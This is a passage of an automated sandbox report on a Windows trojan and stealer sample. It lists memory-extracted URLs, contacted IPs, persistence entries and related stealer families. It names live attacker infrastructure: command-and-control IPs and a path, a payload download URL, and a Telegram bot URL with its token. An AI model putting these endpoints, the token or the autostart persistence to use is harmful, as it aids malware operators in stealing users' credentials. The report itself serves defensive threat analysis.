https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down	dwVrTdy.exe, dwVrTdy.exe, 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000000.2012245571.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE3F6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000000.2029600049.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, dwVrTdy.exe, 0000000A.00000002.2184962694.00007FF643F90000.00000002.00000001.01000000.00000009.sdmp, AzVRM7c.exe, AzVRM7c.exe, 0000000B.00000002.2224494660.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, AzVRM7c.exe, 0000000B.00000000.2075857179.00007FF6845D0000.00000002.00000001.01000000.0000000A.sdmp, t5abhIx.exe, t5abhIx.exe, 0000000D.00000002.2204343711.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp, t5abhIx.exe, 0000000D.00000000.2140730491.00007FF61DDD0000.00000002.00000001.01000000.0000000C.sdmp	false
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin	explorer.exe, 00000014.00000000.2222172086.000000000D1D7000.00000004.00000001.00020000.00000000.sdmp	false
https://screenshots.firefox.com	firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	false
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	false
https://chrome.google.com/webstore~	dwVrTdy.exe, 00000009.00000003.2033916766.000001B9CE439000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033727970.000001B9CE435000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeService	firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/mozilla-services/screenshots	firefox.exe, 0000002C.00000003.2501375547.00000144ACC77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2642733104.00000144ACE00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://api.ip.sb/ip	FBFF.tmp.fcxcx.exe, 00000026.00000000.2427424681.0000000000E52000.00000002.00000001.01000000.00000012.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	F0A3.tmp.ctx.exe, 00000027.00000002.2444899117.0000024335645000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2438058600.0000024335600000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000002.2444169590.0000024335601000.00000004.00000020.00020000.00000000.sdmp, F0A3.tmp.ctx.exe, 00000027.00000003.2437592905.0000024335642000.00000004.00000020.00020000.00000000.sdmp	false
http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/DeferredTask.sys.mjsresource:	firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	false
https://chrome.google.com/webstoreK	AzVRM7c.exe, 0000000B.00000003.2098977782.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097400296.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097224191.000002E277417000.00000004.00000020.00020000.00000000.sdmp	false
https://chrome.google.com/webstoreL	t5abhIx.exe, 0000000D.00000003.2162878766.0000026D645A9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162231625.0000026D645A4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162805710.0000026D645A5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	firefox.exe, 0000002C.00000002.2602661602.00000144A8B7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.datacontract.org/2004/07/System.ServiceModel	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id24Response	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.00000000041FB000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000452F000.00000004.00000800.00020000.00000000.sdmp	false
https://chrome.google.com/webstoreY	AzVRM7c.exe, 0000000B.00000003.2098977782.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097400296.000002E27741B000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097224191.000002E277417000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://api.telegram.org/Account	dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2B37000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/08/addressing	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
https://ipinfo.io/	dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE497000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2145179779.000001B9CE4A9000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2774AD000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	true
https://static.adsafeprotected.com/firefox-etp-js	firefox.exe, 0000002C.00000002.2682991190.00000144AED30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2681975606.00000144AEC10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002C.00000002.2608378311.00000144A9003000.00000004.00000800.00020000.00000000.sdmp	false
https://chrome.google.com/webstorejjK	dwVrTdy.exe, 00000009.00000003.2034061867.000001B9CE447000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034164180.000001B9CE44A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033786317.000001B9CE44E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034384469.000001B9CE456000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2033639099.000001B9CE443000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000003.2034237403.000001B9CE453000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://chrome.google.com/webstore0	t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162445204.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162651119.0000026D6459B000.00000004.00000020.00020000.00000000.sdmp	false
https://sandbox.google.com/	t5abhIx.exe, 0000000D.00000003.2162763970.0000026D645B6000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id5Response	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp, FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
https://screenshots.firefox.com/google	firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id15ResponseD	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	false
https://chrome.google.com/webstore8	dwVrTdy.exe, 0000000A.00000003.2051291870.000001CDE2B13000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000003.2051163209.000001CDE2B10000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id10Response	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id8Response	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
http://www.microsoft.cVN	dwVrTdy.exe, 0000000A.00000002.2184758872.000001CDE3440000.00000004.00000020.00020000.00000000.sdmp	false
https://api.telegram.org/p	dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://api.telegram.org/m	dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://api.telegram.org/r	dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.micro	explorer.exe, 00000014.00000000.2203972255.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.2214469056.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000014.00000000.2214505434.0000000007B10000.00000002.00000001.00040000.00000000.sdmp	false
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false
http://tempuri.org/:hardwares.	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://api.telegram.org/b	AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	false
https://login.microsoftonline.com	firefox.exe, 0000002C.00000002.2709016871.00000144AF89F000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://api.telegram.org/	dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2BB1000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id13Response	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://sandbox.google.com/payments/v4/js/integrator.jsU	AzVRM7c.exe, 0000000B.00000003.2097348132.000002E277429000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 0000000B.00000003.2097183665.000002E277423000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causeshttps://support.mozilla.org	firefox.exe, 0000002C.00000002.2681975606.00000144AEC1B000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2	firefox.exe, 0000002C.00000002.2770184103.00000144B0378000.00000004.00000800.00020000.00000000.sdmp	false
https://mail.yahoo.co.jp/compose/?To=%s	firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	false
https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o	dwVrTdy.exe, 00000009.00000002.2166863480.000001B9CFD10000.00000004.00000020.00020000.00000000.sdmp	false
https://ipinfo.io/jsonhE	t5abhIx.exe, 0000000D.00000002.2203502992.0000026D645B1000.00000004.00000020.00020000.00000000.sdmp	false
https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-	explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false
https://screenshots.firefox.com/	firefox.exe, 0000002C.00000002.2608378311.00000144A907C000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id4ResponseD	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id22ResponseD	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id16ResponseD	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.00000000033BC000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://ipinfo.io/jsonFw	AzVRM7c.exe, 0000000B.00000002.2223576684.000002E277408000.00000004.00000020.00020000.00000000.sdmp	false
https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-	explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id19ResponseD	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003443000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/sc	FBFF.tmp.fcxcx.exe, 00000026.00000002.2673158652.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false
https://sandbox.google.com/payments/v4/js/integrator.js~	t5abhIx.exe, 0000000D.00000003.2162267263.0000026D6459A000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162403692.0000026D645A1000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000000D.00000003.2162176629.0000026D64591000.00000004.00000020.00020000.00000000.sdmp	false
https://www.msn.com/en-us/news/crime/one-dead-several-wounded-after-drive-by-shootings-in-south-la/a	explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false
http://80.82.65.70/files/downloadzV	be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.81.68.147	unknown	Finland	50108	KLNOPT-ASFI	true
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
80.82.65.70	unknown	Netherlands	202425	INT-NETWORKSC	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
216.58.208.238	drive.google.com	United States	15169	GOOGLEUS	false
34.107.221.82	prod.detectportal.prod.cloudops.mozgcp.net	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.17.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
142.250.181.78	youtube.com	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573850
Start date and time:	2024-12-12 16:46:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@113/133@73/14
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 70% Number of executed functions: 151 Number of non-executed functions: 95
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 142.250.181.99, 142.250.181.142, 74.125.131.84, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 13.107.6.158, 20.56.187.20, 2.16.158.97, 2.16.158.170, 2.16.158.81, 2.16.158.82, 2.16.158.83, 2.16.158.169, 2.16.158.96, 2.16.158.176, 2.16.158.88, 2.19.126.152, 2.19.126.145, 172.217.21.35, 173.194.222.84, 172.217.17.46, 88.221.134.209, 88.221.134.155, 142.250.181.67, 172.217.19.202, 172.217.17.74, 13.107.246.63, 52.149.20.212, 23.218.208.109, 40.126.53.11, 94.245.104.56, 20.42.73.29
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, spocs.getpocket.com, clientservices.googleapis.com, aus5.mozilla.org, a19.dscg10.akamai.net, clients2.google.com, e86303.dscx.akamaiedge.net, ipv4only.arpa, login.live.com, config-edge-skype.l-0007.l-msedge.net, firefox.settings.services.mozilla.com, prod.ads.prod.webservices.mozgcp.net, l-0007.l-msedge.net, grahm.xyz, www.bing.com, prod.balrog.prod.cloudops.mozgcp.net, fs.microsoft.com, shavar.prod.mozaws.net, bingadsedgeextension-prod.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, shavar.services.mozilla.com, umwatson.events.data.microsoft.com, clients.l.google.com, location.services.mozilla.com, example.org, ciscobinary.openh264.org, config.edge.skype.com.trafficmanager.net, incoming.telemetry.mozilla.org, a17.rackcdn.com.mdc.edgesuite.net, contile.services.mozilla.com, prod.content-signatur
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
10:48:02	API Interceptor	604617x Sleep call for process: skotes.exe modified
10:48:31	API Interceptor	3939x Sleep call for process: msiexec.exe modified
10:48:31	API Interceptor	3892x Sleep call for process: audiodg.exe modified
10:48:47	API Interceptor	11655x Sleep call for process: explorer.exe modified
10:49:08	API Interceptor	76x Sleep call for process: FBFF.tmp.fcxcx.exe modified
10:49:09	API Interceptor	6x Sleep call for process: graph.exe modified
10:49:13	API Interceptor	22507x Sleep call for process: be08f59021.exe modified
10:49:31	API Interceptor	391x Sleep call for process: d8d3046b98.exe modified
16:46:51	Task Scheduler	Run new task: {EDD80865-E7DE-48F4-ADE4-853B75CC4E0C} path: .
16:47:04	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
16:48:14	Task Scheduler	Run new task: MyBootTask path: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
16:48:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
16:48:32	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe
16:48:40	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Graph C:\Program Files\Windows Media Player\graph\graph.exe
16:48:49	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Services C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe
16:48:57	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 602c785fe5.exe C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe
16:49:06	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d8d3046b98.exe C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
16:49:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9774053d4c.exe C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe
16:49:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 602c785fe5.exe C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe
16:49:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d8d3046b98.exe C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe
16:49:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9774053d4c.exe C:\Users\user\AppData\Local\Temp\1014443001\9774053d4c.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	ZzS8KjNjr7.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	Szi2WJUKmv.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	PGkSZbFKmI.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	FAz4V7wbYU.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	CcIlKT6XdC.exe	Get hash	malicious	Amadey, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
185.81.68.147	tjpq0h4wEH.exe	Get hash	malicious	RedLine	Browse
34.117.59.81	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	ipinfo.io/json
	Code%20Send%20meta%20Discord%20EXE.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
